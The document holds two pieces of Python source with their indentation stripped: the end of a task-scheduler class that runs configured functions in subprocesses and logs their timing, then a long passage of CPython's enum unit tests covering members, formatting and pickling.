self._reset_time(name, time_now)
self.config[name]['execute_num'] += 1
try:
if self.params.config_file is not None:
config = Config(file_py=self.params.config_file)
for name in config.config:
if name not in self.config:
self.config[name] = config.config[name]
self.config[name]['execute_num'] = 0
self.config[name]['time_init'] = time_now
self._reset_time(name, time_now)
if self.params.verbose:
self.params.logger.info(f'New task {name} has been added.', write_file=True)
for i,j in config.config[name].items():
self.config[name][i] = j
self.config[name]['runner'] = (self.config[name]['function'], self.config[name]['args'],
self.config[name]['kwargs'], name)
except Exception as msg:
if self.params.verbose:
self.params.logger.info(str(msg), write_file=True)
def _run(self, runner):
"""Runs function runner """
output, error, got_error = None, None, False
started = datetime.datetime.now()
try:
output = runner[0](*runner[1], **runner[2])
except Exception as e:
got_error = True
error = str(e)
finally:
finished = datetime.datetime.now()
self.params.tracker_dict[runner[3]] = {
"output": output,
"started_time": started,
"finished_time": finished,
"execution_time": (finished - started).total_seconds(),
"got_error": got_error,
"error": error}
msg = (f'task {runner[3]} started_time: {str(started)[:19]}, finished_time: {str(finished)[:19]}, '+
f'execution_time: {round((finished - started).total_seconds(),4)}s, got_error: {got_error}, error: {error}.')
if self.params.verbose:
self.params.logger.info(msg, write_file=True)
elif self.params.logger is not None:
self.params.logger.write(msg)
def _start(self, runner):
"""Starts runner process """
self.params.runner_dict[runner[3]] = multiprocessing.Process(target=self._run, args=(runner,))
self.params.runner_dict[runner[3]].daemon = True
self.params.runner_dict[runner[3]].start()
|
test_enum.py
|
import enum
import doctest
import inspect
import os
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, StrEnum, EnumType, Flag, IntFlag, unique, auto
from enum import STRICT, CONFORM, EJECT, KEEP, _simple_enum, _test_simple_enum
from enum import verify, UNIQUE, CONTINUOUS, NAMED_FLAGS
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from test.support import ALWAYS_EQ
from test.support import threading_helper
from datetime import timedelta
python_version = sys.version_info[:2]
def load_tests(loader, tests, ignore):
tests.addTests(doctest.DocTestSuite(enum))
if os.path.exists('Doc/library/enum.rst'):
tests.addTests(doctest.DocFileSuite(
'../../Doc/library/enum.rst',
optionflags=doctest.ELLIPSIS|doctest.NORMALIZE_WHITESPACE,
))
return tests
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), season)
self.assertEqual(repr(e), 'Season.{0}'.format(season))
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
3 in Season
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
#
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum memmbers before 3.12',
)
def test_contains_tf(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
self.assertTrue(3 in Season)
self.assertFalse('AUTUMN' in Season)
val = Season(3)
self.assertIn(val, Season)
#
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_reserved__sunder_(self):
with self.assertRaisesRegex(
ValueError,
'_sunder_ names, such as ._bad_., are reserved',
):
class Bad(Enum):
_bad_ = 1
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
@unittest.skipIf(
python_version < (3, 12),
'mixin-format is still using member.value',
)
def test_mixin_format_warning(self):
class Grades(int, Enum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.assertEqual(f'{self.Grades.B}', 'B')
@unittest.skipIf(
python_version >= (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_mixin_format_warning(self):
class Grades(int, Enum):
A = 5
B = 4
C = 3
D = 2
F = 0
with self.assertWarns(DeprecationWarning):
self.assertEqual(f'{Grades.B}', '4')
def assertFormatIsValue(self, spec, member):
if python_version < (3, 12) and (not spec or spec in ('{}','{:}')):
with self.assertWarns(DeprecationWarning):
self.assertEqual(spec.format(member), spec.format(member.value))
else:
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
class Grades(int, Enum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
def __repr__(self):
return '<%s.%s: %r>' % (self.__class__.__name__, self._name_, self._value_)
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
#
class SillyInt(HexInt):
__qualname__ = 'SillyInt'
pass
class MyOtherEnum(SillyInt, enum.Enum):
__qualname__ = 'MyOtherEnum'
D = 4
E = 5
F = 6
self.assertIs(MyOtherEnum._member_type_, SillyInt)
globals()['SillyInt'] = SillyInt
globals()['MyOtherEnum'] = MyOtherEnum
test_pickle_dump_load(self.assertIs, MyOtherEnum.E)
test_pickle_dump_load(self.assertIs, MyOtherEnum)
#
# This did not work in 3.9, but does now with pickling by name
class UnBrokenInt(int):
__qualname__ = 'UnBrokenInt'
def __new__(cls, value):
return int.__new__(cls, value)
class MyUnBrokenEnum(UnBrokenInt, Enum):
__qualname__ = 'MyUnBrokenEnum'
G = 7
H = 8
I = 9
self.assertIs(MyUnBrokenEnum._member_type_, UnBrokenInt)
self.assertIs(MyUnBrokenEnum(7), MyUnBrokenEnum.G)
globals()['UnBrokenInt'] = UnBrokenInt
globals()['MyUnBrokenEnum'] = MyUnBrokenEnum
test_pickle_dump_load(self.assertIs, MyUnBrokenEnum.I)
test_pickle_dump_load(self.assertIs, MyUnBrokenEnum)
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited_methods(self):
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
self.assertEqual(phy.pi.upper(), 'PI')
self.assertEqual(phy.tau.count('a'), 1)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_global_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
